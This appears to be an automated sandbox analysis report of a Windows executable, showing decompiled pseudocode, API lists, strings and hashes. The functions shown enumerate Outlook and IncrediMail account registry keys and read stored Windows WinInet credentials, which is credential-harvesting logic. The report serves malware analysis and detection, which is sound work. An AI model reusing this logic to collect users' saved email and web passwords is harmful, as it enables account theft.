				_t83 = __fp0;
				_t64 = __ecx;
				_t35 = E0040EB3F(0x80000001, "Identities",  &_v8);
				_t74 = _t73 + 0xc;
				if(_t35 == 0) {
					_v12 = 0;
					_v276 = 0;
					memset( &_v275, 0, 0xff);
					_t40 = E0040EC05(_v8, 0,  &_v276);
					_t75 = _t74 + 0x18;
					if(_t40 == 0) {
						_t66 = "%s\\%s";
						do {
							_t69 = _a4;
							E0040EBC1(_t64, _v8,  &_v276, "Username", _a4 + 0xa9c, 0x7f);
							_v1300 = 0;
							memset( &_v1299, 0, 0x3ff);
							sprintf( &_v1300, _t66,  &_v276, "Software\\Microsoft\\Internet Account Manager\\Accounts");
							_t52 = E0040EB3F(_v8,  &_v1300,  &_v16);
							_t76 = _t75 + 0x3c;
							_t80 = _t52;
							if(_t52 == 0) {
								E00402BB8(_t64,  &_v16, _t80, _t83, _t69, 1);
							}
							sprintf( &_v1300, _t66,  &_v276, "Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts");
							_t58 = E0040EB3F(_v8,  &_v1300,  &_v20);
							_t77 = _t76 + 0x1c;
							_t81 = _t58;
							if(_t58 == 0) {
								E00402BB8(_t64,  &_v20, _t81, _t83, _a4, 5);
							}
							_v12 = _v12 + 1;
							_t60 = E0040EC05(_v8, _v12,  &_v276);
							_t75 = _t77 + 0xc;
						} while (_t60 == 0);
					}
					RegCloseKey(_v8);
				}
				_t36 = _a4;
				 *((char*)(_t36 + 0xa9c)) = 0;
				return _t36;
			}


























                                                                                0x00402c44
                                                                                0x00402c44
                                                                                0x00402c5c
                                                                                0x00402c61
                                                                                0x00402c68
                                                                                0x00402c7b
                                                                                0x00402c7e
                                                                                0x00402c84
                                                                                0x00402c94
                                                                                0x00402c99
                                                                                0x00402c9e
                                                                                0x00402ca6
                                                                                0x00402cab
                                                                                0x00402cab
                                                                                0x00402cc6
                                                                                0x00402cd8
                                                                                0x00402cde
                                                                                0x00402cf7
                                                                                0x00402d0a
                                                                                0x00402d0f
                                                                                0x00402d12
                                                                                0x00402d14
                                                                                0x00402d1c
                                                                                0x00402d1c
                                                                                0x00402d35
                                                                                0x00402d48
                                                                                0x00402d4d
                                                                                0x00402d50
                                                                                0x00402d52
                                                                                0x00402d5c
                                                                                0x00402d5c
                                                                                0x00402d61
                                                                                0x00402d71
                                                                                0x00402d76
                                                                                0x00402d79
                                                                                0x00402d82
                                                                                0x00402d86
                                                                                0x00402d86
                                                                                0x00402d8c
                                                                                0x00402d8f
                                                                                0x00402d97

                                                                                APIs
                                                                                  • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                • memset.MSVCRT ref: 00402C84
                                                                                  • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32 ref: 0040EC28
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402D86
                                                                                  • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                                                • memset.MSVCRT ref: 00402CDE
                                                                                • sprintf.MSVCRT ref: 00402CF7
                                                                                • sprintf.MSVCRT ref: 00402D35
                                                                                  • Part of subcall function 00402BB8: memset.MSVCRT ref: 00402BD8
                                                                                  • Part of subcall function 00402BB8: RegCloseKey.ADVAPI32 ref: 00402C3C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Closememset$sprintf$EnumOpen
                                                                                • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                • API String ID: 1831126014-3814494228
                                                                                • Opcode ID: e558669e5098f51d47a130cd26e8095db06e1949dd15f7d6cacb61a667ea587b
                                                                                • Instruction ID: 6c0256c292ffb55b53f7a2730c4bcad7d13cefd93b753116a94389aae211c0df
                                                                                • Opcode Fuzzy Hash: e558669e5098f51d47a130cd26e8095db06e1949dd15f7d6cacb61a667ea587b
                                                                                • Instruction Fuzzy Hash: 25315C72D0011DBADB11EA96CD46EEFB77CAF04344F0405BABA19F2091E6B49F988F54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040B53C, Relevance: 16.6, APIs: 11, Instructions: 133windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 93%
                                                                                			E0040B53C(void* __ecx, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				void* _v8;
				intOrPtr _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __esi;
				signed int _t45;
				intOrPtr _t50;
				signed int _t53;
				intOrPtr _t82;
				signed char _t86;
				intOrPtr _t88;
				intOrPtr _t90;
				void* _t91;
				void* _t92;

				_t84 = __ecx;
				_t88 = _a4;
				_t92 = _t88 - 0x402;
				_t91 = __ecx;
				if(_t92 > 0) {
					_t45 = _t88 - 0x415;
					__eflags = _t45;
					if(_t45 == 0) {
						E0040A4C8(__ecx);
						L22:
						__eflags = 0;
						E0040A27F(0, _t84, _t91, 0);
						L23:
						if(_t88 ==  *((intOrPtr*)(_t91 + 0x374))) {
							_t81 = _a12;
							_t86 =  *(_a12 + 0xc);
							_t50 =  *((intOrPtr*)(_t91 + 0x370));
							if((_t86 & 0x00000008) == 0) {
								__eflags = _t86 & 0x00000040;
								if((_t86 & 0x00000040) != 0) {
									 *0x4171ac =  *0x4171ac & 0x00000000;
									__eflags =  *0x4171ac;
									SetFocus( *(_t50 + 0x184));
								}
							} else {
								E00409D7E(_t50, _t81);
							}
						}
						return E004019AC(_t91, _t88, _a8, _a12);
					}
					_t53 = _t45 - 1;
					__eflags = _t53;
					if(_t53 == 0) {
						E0040A56C(__ecx);
						goto L22;
					}
					__eflags = _t53 == 6;
					if(_t53 == 6) {
						SetFocus( *(__ecx + 0x378));
					}
					goto L23;
				}
				if(_t92 == 0) {
					 *(__ecx + 0x25c) =  *(__ecx + 0x25c) & 0x00000000;
					E0040A437(__ecx);
					goto L22;
				}
				if(_t88 == 0x1c) {
					__eflags = _a8;
					if(_a8 == 0) {
						 *((intOrPtr*)(_t91 + 0x378)) = GetFocus();
					} else {
						PostMessageA( *(__ecx + 0x108), 0x41c, 0, 0);
					}
					goto L23;
				}
				if(_t88 == 0x20) {
					__eflags = _a8 -  *((intOrPtr*)(__ecx + 0x114));
					if(_a8 !=  *((intOrPtr*)(__ecx + 0x114))) {
						goto L23;
					}
					SetCursor(LoadCursorA( *0x416b94, 0x67));
					return 1;
				}
				if(_t88 == 0x2b) {
					_t82 = _a12;
					__eflags =  *((intOrPtr*)(_t82 + 0x14)) -  *((intOrPtr*)(__ecx + 0x114));
					if( *((intOrPtr*)(_t82 + 0x14)) ==  *((intOrPtr*)(__ecx + 0x114))) {
						SetBkMode( *(_t82 + 0x18), 1);
						SetTextColor( *(_t82 + 0x18), 0xff0000);
						_v8 = SelectObject( *(_t82 + 0x18),  *(__ecx + 0x258));
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t90 = _a12;
						_v28 = 0x14;
						_v20 = 5;
						DrawTextExA( *(_t90 + 0x18), __ecx + 0x158, 0xffffffff, _t90 + 0x1c, 4,  &_v28);
						SelectObject( *(_t90 + 0x18), _v8);
						_t88 = _a4;
					}
				} else {
					if(_t88 == 0x7b) {
						_t87 = _a8;
						if(_a8 ==  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x370)) + 0x184))) {
							E0040B372(__ecx, _t87);
						}
					}
				}
				goto L23;
			}


















                                                                                0x0040b53c
                                                                                0x0040b545
                                                                                0x0040b54d
                                                                                0x0040b54f
                                                                                0x0040b551
                                                                                0x0040b689
                                                                                0x0040b689
                                                                                0x0040b68e
                                                                                0x0040b6b1
                                                                                0x0040b6b6
                                                                                0x0040b6b6
                                                                                0x0040b6b8
                                                                                0x0040b6bd
                                                                                0x0040b6c3
                                                                                0x0040b6c5
                                                                                0x0040b6c8
                                                                                0x0040b6ce
                                                                                0x0040b6d4
                                                                                0x0040b6dd
                                                                                0x0040b6e0
                                                                                0x0040b6e8
                                                                                0x0040b6e8
                                                                                0x0040b6ef
                                                                                0x0040b6ef
                                                                                0x0040b6d6
                                                                                0x0040b6d6
                                                                                0x0040b6d6
                                                                                0x0040b6d4
                                                                                0x00000000
                                                                                0x0040b6fe
                                                                                0x0040b690
                                                                                0x0040b690
                                                                                0x0040b691
                                                                                0x0040b6a8
                                                                                0x00000000
                                                                                0x0040b6a8
                                                                                0x0040b693
                                                                                0x0040b696
                                                                                0x0040b69e
                                                                                0x0040b69e
                                                                                0x00000000
                                                                                0x0040b696
                                                                                0x0040b557
                                                                                0x0040b679
                                                                                0x0040b680
                                                                                0x00000000
                                                                                0x0040b680
                                                                                0x0040b560
                                                                                0x0040b651
                                                                                0x0040b654
                                                                                0x0040b671
                                                                                0x0040b656
                                                                                0x0040b663
                                                                                0x0040b663
                                                                                0x00000000
                                                                                0x0040b654
                                                                                0x0040b569
                                                                                0x0040b626
                                                                                0x0040b62c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040b641
                                                                                0x00000000
                                                                                0x0040b649
                                                                                0x0040b572
                                                                                0x0040b59e
                                                                                0x0040b5a4
                                                                                0x0040b5aa
                                                                                0x0040b5b5
                                                                                0x0040b5c3
                                                                                0x0040b5da
                                                                                0x0040b5e2
                                                                                0x0040b5e3
                                                                                0x0040b5e4
                                                                                0x0040b5e5
                                                                                0x0040b5e6
                                                                                0x0040b5ff
                                                                                0x0040b606
                                                                                0x0040b60d
                                                                                0x0040b619
                                                                                0x0040b61b
                                                                                0x0040b61b
                                                                                0x0040b574
                                                                                0x0040b577
                                                                                0x0040b583
                                                                                0x0040b58c
                                                                                0x0040b594
                                                                                0x0040b594
                                                                                0x0040b58c
                                                                                0x0040b577
                                                                                0x00000000

                                                                                APIs
                                                                                • SetBkMode.GDI32(?,00000001), ref: 0040B5B5
                                                                                • SetTextColor.GDI32(?,00FF0000), ref: 0040B5C3
                                                                                • SelectObject.GDI32(?,?), ref: 0040B5D8
                                                                                • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040B60D
                                                                                • SelectObject.GDI32(00000014,?), ref: 0040B619
                                                                                  • Part of subcall function 0040B372: GetCursorPos.USER32(?), ref: 0040B37F
                                                                                  • Part of subcall function 0040B372: GetSubMenu.USER32 ref: 0040B38D
                                                                                  • Part of subcall function 0040B372: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040B3BA
                                                                                • LoadCursorA.USER32 ref: 0040B63A
                                                                                • SetCursor.USER32(00000000), ref: 0040B641
                                                                                • PostMessageA.USER32 ref: 0040B663
                                                                                • SetFocus.USER32(?), ref: 0040B69E
                                                                                • SetFocus.USER32(?), ref: 0040B6EF
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                • String ID:
                                                                                • API String ID: 1416211542-0
                                                                                • Opcode ID: ada7ac9db0802c40b78b434d5b067a752f7538f931aaa86afb59dd9be5820f54
                                                                                • Instruction ID: 8f05fcf81e8b57b2917fe7890bba9475612e1218cdf4c3fdd04c744704700eb5
                                                                                • Opcode Fuzzy Hash: ada7ac9db0802c40b78b434d5b067a752f7538f931aaa86afb59dd9be5820f54
                                                                                • Instruction Fuzzy Hash: E741A271100605EFCB119F64CD89EEE7775FB08300F104936E615A62A1CB799D91DBDE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405FC6, Relevance: 16.6, APIs: 11, Instructions: 58clipboardmemoryfileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00405FC6(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				long _v8;
				void* _v12;
				long _v16;
				void* _t14;
				void* _t29;
				void* _t34;
				long _t36;

				_v8 = _v8 & 0x00000000;
				EmptyClipboard();
				_t14 = E00405ECB(_a4);
				_v12 = _t14;
				if(_t14 == 0xffffffff) {
					_v8 = GetLastError();
				} else {
					_t36 = GetFileSize(_t14, 0);
					_t5 = _t36 + 1; // 0x1
					_t29 = GlobalAlloc(0x2000, _t5);
					if(_t29 == 0) {
						L4:
						_v8 = GetLastError();
					} else {
						_t34 = GlobalLock(_t29);
						if(ReadFile(_v12, _t34, _t36,  &_v16, 0) == 0) {
							goto L4;
						} else {
							 *((char*)(_t34 + _t36)) = 0;
							GlobalUnlock(_t29);
							SetClipboardData(1, _t29);
						}
					}
					CloseHandle(_v12);
				}
				CloseClipboard();
				return _v8;
			}










                                                                                0x00405fcc
                                                                                0x00405fd0
                                                                                0x00405fd9
                                                                                0x00405fe2
                                                                                0x00405fe5
                                                                                0x0040605b
                                                                                0x00405fe7
                                                                                0x00405ff3
                                                                                0x00405ff5
                                                                                0x00406004
                                                                                0x00406008
                                                                                0x0040603e
                                                                                0x00406044
                                                                                0x0040600a
                                                                                0x00406013
                                                                                0x00406026
                                                                                0x00000000
                                                                                0x00406028
                                                                                0x00406029
                                                                                0x0040602d
                                                                                0x00406036
                                                                                0x00406036
                                                                                0x00406026
                                                                                0x0040604a
                                                                                0x00406052
                                                                                0x0040605e
                                                                                0x00406068

                                                                                APIs
                                                                                • EmptyClipboard.USER32 ref: 00405FD0
                                                                                  • Part of subcall function 00405ECB: CreateFileA.KERNEL32(00410C96,80000000,00000001,00000000,00000003,00000000,00000000,00410BD2,?,rA,00410C96,?,?,*.oeaccount,rA,?), ref: 00405EDD
                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00405FED
                                                                                • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00405FFE
                                                                                • GlobalLock.KERNEL32 ref: 0040600B
                                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040601E
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0040602D
                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 00406036
                                                                                • GetLastError.KERNEL32 ref: 0040603E
                                                                                • CloseHandle.KERNEL32(?), ref: 0040604A
                                                                                • GetLastError.KERNEL32 ref: 00406055
                                                                                • CloseClipboard.USER32 ref: 0040605E
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                • String ID:
                                                                                • API String ID: 3604893535-0
                                                                                • Opcode ID: 5804eb7593f705abb245538e10f585bb03ca14e3a9190401cfadc2aaba18f8ee
                                                                                • Instruction ID: 732aa9399b2cd23c9d945101f46e029b0eae2bee8c87a14991e63b5ea8a72c25
                                                                                • Opcode Fuzzy Hash: 5804eb7593f705abb245538e10f585bb03ca14e3a9190401cfadc2aaba18f8ee
                                                                                • Instruction Fuzzy Hash: 6A113371900205FBDB109BB4DE4DBDE7F78EB08351F118176F606E1190DBB48A20DB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040EDDB, Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • strcpy.MSVCRT(?,Common Programs,0040EEF9,?,?,?,?,?,00000104), ref: 0040EE4E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strcpy
                                                                                • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                • API String ID: 3177657795-318151290
                                                                                • Opcode ID: 69181002a60778507a3d541a40da82393cbcfb54362146d699c3396572d884a2
                                                                                • Instruction ID: 838bbb5fcb7671a25bd4d31fd75230584a1d4f3c41bb848f6a939ae912ddcdf8
                                                                                • Opcode Fuzzy Hash: 69181002a60778507a3d541a40da82393cbcfb54362146d699c3396572d884a2
                                                                                • Instruction Fuzzy Hash: 66F0BDB32A878EF0D429496BCD4AEB744429151B46B7C4D37A002B46D5E87D8AF260DF
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040765B, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 152COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 74%
                                                                                			E0040765B(void* __eflags, intOrPtr* _a4) {
				char _v532;
				short _v534;
				void _v1042;
				void _v1044;
				long _v1080;
				intOrPtr _v1084;
				intOrPtr _v1088;
				intOrPtr _v1096;
				int _v1104;
				char _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				intOrPtr _v1120;
				intOrPtr _v1124;
				intOrPtr _v1128;
				intOrPtr _v1132;
				long* _v1136;
				wchar_t* _v1140;
				wchar_t* _v1144;
				intOrPtr _v1148;
				char _v1152;
				intOrPtr _v1156;
				char _v1160;
				void* _v1164;
				void* _v1168;
				int _v1172;
				intOrPtr _v1176;
				char _v1180;
				char _v1184;
				signed int _v1188;
				void* __edi;
				void* __esi;
				void* _t76;
				int _t83;
				wchar_t* _t109;
				wchar_t* _t110;
				signed int _t120;
				int _t126;
				void* _t129;
				intOrPtr _t134;
				signed int _t140;
				void* _t142;
				void* _t143;
				void* _t144;

				_t142 = (_t140 & 0xfffffff8) - 0x4a4;
				_push(_t129);
				_v1108 = 0;
				_v1104 = 0;
				if(E00404647( &_v1108, _t129, __eflags) != 0) {
					_v1184 = 0;
					_v1180 = 0;
					if(_v1088 == 0) {
						_t76 = 0;
						__eflags = 0;
					} else {
						_t76 = _v1084(0, 0,  &_v1180,  &_v1184);
					}
					if(_t76 != 0) {
						_t120 = 9;
						memcpy( &_v1080, L"Microsoft_WinInet", _t120 << 2);
						_t143 = _t142 + 0xc;
						_v1172 = wcslen( &_v1080);
						_v1176 = 1;
						_v1188 = 0;
						if(_v1180 > 0) {
							while(_v1176 != 0) {
								_t134 =  *((intOrPtr*)(_v1184 + _v1188 * 4));
								_t83 = wcsncmp( *(_t134 + 8),  &_v1080, _v1172);
								_t143 = _t143 + 0xc;
								if(_t83 == 0) {
									do {
										_t25 = L"abe2869f-9b47-4cd9-a358-c22904dba7f7" + _t83; // 0x620061
										 *(_t83 + 0x417968) =  *_t25 << 2;
										_t83 = _t83 + 2;
										_t152 = _t83 - 0x4a;
									} while (_t83 < 0x4a);
									_v1148 =  *((intOrPtr*)(_t134 + 0x1c));
									_t139 =  &_v532;
									_v1160 = 0x4a;
									_v1156 = 0x417968;
									_v1152 =  *((intOrPtr*)(_t134 + 0x18));
									E004046D7( &_v532);
									if(E004047A0( &_v532, _t152) != 0 && E00404811(_t139,  &_v1152,  &_v1160,  &_v1168) != 0) {
										_v1044 = 0;
										memset( &_v1042, 0, 0x1fe);
										_t126 = _v1168;
										_t144 = _t143 + 0xc;
										if(_t126 > 0x1fa) {
											_t126 = 0x1fa;
										}
										memcpy( &_v1044, _v1164, _t126);
										_v1120 =  *((intOrPtr*)(_t134 + 0x20));
										_v1124 =  *((intOrPtr*)(_t134 + 4));
										_v1116 =  *((intOrPtr*)(_t134 + 0x10));
										_v1112 =  *((intOrPtr*)(_t134 + 0x14));
										_v1128 =  *((intOrPtr*)(_t134 + 0x2c));
										_v1144 =  *(_t134 + 8);
										_v1132 =  *((intOrPtr*)(_t134 + 0xc));
										_t109 =  &_v1044;
										_v534 = 0;
										_v1140 = _t109;
										_v1136 = 0x4125f4;
										_t110 = wcschr(_t109, 0x3a);
										_t143 = _t144 + 0x14;
										if(_t110 != 0) {
											 *_t110 = 0;
											_v1136 =  &(_t110[0]);
										}
										_v1180 =  *((intOrPtr*)( *_a4))( &_v1144);
										LocalFree(_v1168);
									}
									E004047F1( &_v532);
								}
								_v1188 = _v1188 + 1;
								if(_v1188 < _v1180) {
									continue;
								}
								goto L18;
							}
						}
						L18:
						_v1096(_v1184);
					}
				}
				return E004046C2( &_v1108);
			}















































                                                                                0x00407661
                                                                                0x0040766b
                                                                                0x00407670
                                                                                0x00407674
                                                                                0x0040767f
                                                                                0x00407689
                                                                                0x0040768d
                                                                                0x00407691
                                                                                0x004076a8
                                                                                0x004076a8
                                                                                0x00407693
                                                                                0x0040769f
                                                                                0x0040769f
                                                                                0x004076ac
                                                                                0x004076b4
                                                                                0x004076c3
                                                                                0x004076c3
                                                                                0x004076cf
                                                                                0x004076d3
                                                                                0x004076db
                                                                                0x004076df
                                                                                0x004076e5
                                                                                0x004076f7
                                                                                0x00407709
                                                                                0x0040770e
                                                                                0x00407713
                                                                                0x00407719
                                                                                0x00407719
                                                                                0x00407724
                                                                                0x0040772c
                                                                                0x0040772d
                                                                                0x0040772d
                                                                                0x00407735
                                                                                0x0040773c
                                                                                0x00407743
                                                                                0x0040774b
                                                                                0x00407753
                                                                                0x00407757
                                                                                0x00407763
                                                                                0x00407795
                                                                                0x0040779d
                                                                                0x004077a2
                                                                                0x004077ab
                                                                                0x004077b0
                                                                                0x004077b2
                                                                                0x004077b2
                                                                                0x004077c1
                                                                                0x004077c9
                                                                                0x004077d0
                                                                                0x004077d7
                                                                                0x004077de
                                                                                0x004077e5
                                                                                0x004077ec
                                                                                0x004077f3
                                                                                0x004077f7
                                                                                0x00407801
                                                                                0x00407809
                                                                                0x0040780d
                                                                                0x00407815
                                                                                0x0040781a
                                                                                0x0040781f
                                                                                0x00407821
                                                                                0x00407827
                                                                                0x00407827
                                                                                0x0040783b
                                                                                0x0040783f
                                                                                0x0040783f
                                                                                0x0040784c
                                                                                0x0040784c
                                                                                0x00407851
                                                                                0x0040785d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040785d
                                                                                0x004076e5
                                                                                0x00407863
                                                                                0x00407867
                                                                                0x00407867
                                                                                0x004076ac
                                                                                0x0040787a

                                                                                APIs
                                                                                  • Part of subcall function 00404647: LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,73AFF420), ref: 00404654
                                                                                  • Part of subcall function 00404647: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
                                                                                  • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
                                                                                  • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
                                                                                  • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
                                                                                  • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D
                                                                                • wcslen.MSVCRT ref: 004076C5
                                                                                • wcsncmp.MSVCRT(?,?,?), ref: 00407709
                                                                                • memset.MSVCRT ref: 0040779D
                                                                                • memcpy.MSVCRT ref: 004077C1
                                                                                • wcschr.MSVCRT ref: 00407815
                                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040783F
                                                                                  • Part of subcall function 004047F1: FreeLibrary.KERNELBASE(?,?), ref: 00404806
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$FreeLibrary$LoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                • String ID: J$Microsoft_WinInet$hyA
                                                                                • API String ID: 2413121283-319027496
                                                                                • Opcode ID: 3dbe31861b291603ba55481dc935e5bf9676d9bb6e305c4de7996f9a1c48bd4b
                                                                                • Instruction ID: ab6451454baefbc6762688e22d5ebab6c31fbbbf8d38218599acfc9a6d4ef790
                                                                                • Opcode Fuzzy Hash: 3dbe31861b291603ba55481dc935e5bf9676d9bb6e305c4de7996f9a1c48bd4b
                                                                                • Instruction Fuzzy Hash: 2751E4B1908345AFC710EF65C88495AB7E8FF89304F00492EFA99D3250E778E955CB57
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402FC2, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 106registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00402FC2(void* __eax, void* __ecx, void* __fp0, void* _a4) {
				void* _v8;
				int _v12;
				int _v16;
				void _v271;
				char _v272;
				void _v527;
				char _v528;
				void _v827;
				char _v828;
				void* __edi;
				void* __esi;
				long _t40;
				void* _t44;
				void* _t55;
				void* _t60;
				void* _t66;
				void* _t67;
				void* _t71;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t77;

				_t77 = __fp0;
				_t66 = __ecx;
				_t67 = __eax;
				_t40 = E0040EB3F(_a4, "Software\\IncrediMail\\Identities",  &_a4);
				_t72 = _t71 + 0xc;
				if(_t40 == 0) {
					_v12 = 0;
					_v272 = 0;
					memset( &_v271, 0, 0xff);
					_t44 = E0040EC05(_a4, 0,  &_v272);
					_t73 = _t72 + 0x18;
					while(_t44 == 0) {
						E0040EBC1(_t66, _a4,  &_v272, "Identity", _t67 + 0xa9c, 0x7f);
						_v828 = 0;
						memset( &_v827, 0, 0x12b);
						sprintf( &_v828, "%s\\Accounts",  &_v272);
						_t55 = E0040EB3F(_a4,  &_v828,  &_v8);
						_t74 = _t73 + 0x38;
						if(_t55 == 0) {
							_v16 = 0;
							_v528 = 0;
							memset( &_v527, 0, 0xff);
							_t60 = E0040EC05(_v8, 0,  &_v528);
							_t74 = _t74 + 0x18;
							while(_t60 == 0) {
								E00402D9A(_t66, _t67, 0xff, _t77, _v8,  &_v528);
								_v16 = _v16 + 1;
								_t60 = E0040EC05(_v8, _v16,  &_v528);
								_t74 = _t74 + 0xc;
							}
							RegCloseKey(_v8);
						}
						_v12 = _v12 + 1;
						_t44 = E0040EC05(_a4, _v12,  &_v272);
						_t73 = _t74 + 0xc;
					}
					_t40 = RegCloseKey(_a4);
				}
				 *((char*)(_t67 + 0xa9c)) = 0;
				return _t40;
			}

























                                                                                0x00402fc2
                                                                                0x00402fc2
                                                                                0x00402fcd
                                                                                0x00402fdb
                                                                                0x00402fe0
                                                                                0x00402fe7
                                                                                0x00402ffc
                                                                                0x00402fff
                                                                                0x00403005
                                                                                0x00403015
                                                                                0x0040301a
                                                                                0x00403101
                                                                                0x0040303a
                                                                                0x0040304c
                                                                                0x00403052
                                                                                0x0040306a
                                                                                0x0040307d
                                                                                0x00403082
                                                                                0x00403087
                                                                                0x00403092
                                                                                0x00403095
                                                                                0x0040309b
                                                                                0x004030ab
                                                                                0x004030b0
                                                                                0x004030dc
                                                                                0x004030bf
                                                                                0x004030c4
                                                                                0x004030d4
                                                                                0x004030d9
                                                                                0x004030d9
                                                                                0x004030e3
                                                                                0x004030e3
                                                                                0x004030e9
                                                                                0x004030f9
                                                                                0x004030fe
                                                                                0x004030fe
                                                                                0x0040310c
                                                                                0x00403112
                                                                                0x00403113
                                                                                0x0040311c

                                                                                APIs
                                                                                  • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                • memset.MSVCRT ref: 00403005
                                                                                  • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32 ref: 0040EC28
                                                                                • memset.MSVCRT ref: 00403052
                                                                                • sprintf.MSVCRT ref: 0040306A
                                                                                • memset.MSVCRT ref: 0040309B
                                                                                • RegCloseKey.ADVAPI32(?), ref: 004030E3
                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040310C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$Close$EnumOpensprintf
                                                                                • String ID: %s\Accounts$Identity$Software\IncrediMail\Identities
                                                                                • API String ID: 3672803090-3168940695
                                                                                • Opcode ID: 0cf548ca034e9c156653f3b1dbb9e895c43ca7fac2608918d84bd2d804a0d0b2
                                                                                • Instruction ID: 2ec2bfd25db4f87ede08292043277b4916c0dadc31aa5cf960337fea200e46ca
                                                                                • Opcode Fuzzy Hash: 0cf548ca034e9c156653f3b1dbb9e895c43ca7fac2608918d84bd2d804a0d0b2
                                                                                • Instruction Fuzzy Hash: D6314EB290021CBADB11EB95CC81EEEBB7CAF14344F0041B6B909A1051E7799F948F64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00407A64, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowstringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 48%
